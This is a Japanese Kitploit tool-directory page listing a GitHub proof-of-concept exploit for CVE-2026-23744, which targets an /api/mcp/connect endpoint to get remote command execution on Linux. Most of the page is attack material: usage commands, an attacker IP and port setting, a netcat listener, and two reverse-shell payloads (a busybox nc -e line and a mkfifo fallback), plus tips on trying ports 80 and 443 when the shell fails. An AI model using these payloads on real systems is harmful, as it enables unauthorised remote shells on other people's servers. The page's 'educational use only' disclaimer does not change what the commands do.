Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/h1sok444/cve-2026-23744-poc
エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツールペイロード開発
GitHubh1sok444/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744の概念実証エクスプロイト。Linuxシステム上でリバースシェルを介したリモートコマンド実行を実現するため、/api/mcp/connectを標的とします。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744-PoC

MCP RCE エクスプロイト (Linux)

/api/mcp/connect を悪用してリモートコマンド実行を行うPoCです。


要件

root@kitploit:~
pip install requests

使用方法

root@kitploit:~
python3 exploit.py <ターゲット>

例:

root@kitploit:~
python3 exploit.py mcp.something.com

設定 (スクリプト内で編集)

root@kitploit:~
attacker_ip = "YOUR_IP"
port = 4444

リスナー

root@kitploit:~
nc -lvnp 4444

ペイロード

デフォルト:

root@kitploit:~
busybox nc <IP> <PORT> -e /bin/sh

フォールバック:

root@kitploit:~
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f


注意事項

  • シェルが取得できない場合はポート80/443を試す
  • -e が失敗した場合はフォールバックを使用する

免責事項

教育目的のみで使用してください。

ツールをダウンロード